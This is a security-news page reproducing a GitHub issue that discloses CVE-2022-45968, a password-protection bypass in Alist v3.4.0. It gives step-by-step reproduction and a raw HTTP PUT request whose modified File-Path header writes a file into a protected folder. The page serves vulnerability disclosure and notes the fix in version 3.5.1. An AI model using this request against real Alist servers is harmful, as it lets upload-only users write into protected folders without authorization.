Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45968: Upload files to the directory with password Vulnerability(bypass) · Issue #2444 · alist-org/alist

Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one).

CVE
#vulnerability#mac#js#git#intel#auth#firefox

Please make sure of the following things

  • I have read the documentation.
  • I’m sure there are no duplicate issues or discussions.
  • I’m sure it’s due to alist and not something else(such as Dependencies or Operational).
  • I’m sure I’m using the latest version

Alist Version / Alist 版本

v3.4.0

Driver used / 使用的存储驱动

Local

Describe the bug / 问题描述

  • A user with only file upload permission can upload any file to any folder (even a password protected one)

Reproduction:

  • Login as a user who only have the right to upload file

  • You can see that the /testPasswd folder is password protected

  • Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package

![image](https://user-images.githubusercontent.com/52377340/203211925-7ac5b6b8-78e4-4981-bf06-9452fa653e5f.png)

  • Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet

  • Enter the password into the folder to find the file uploaded successfully

Reproduction / 复现链接

Package:

PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.148:52000/test
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4
Content-Type: application/octet-stream
File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3
As-Task: false
Content-Length: 55875
Origin: http://192.168.31.148:52000
Connection: close

�PNG

Logs / 日志

No response

Related news

GHSA-4gjr-vgfx-9qvw: AList vulnerable to Improper Preservation of Permissions

Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one). Version 3.5.1 contains a patch.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907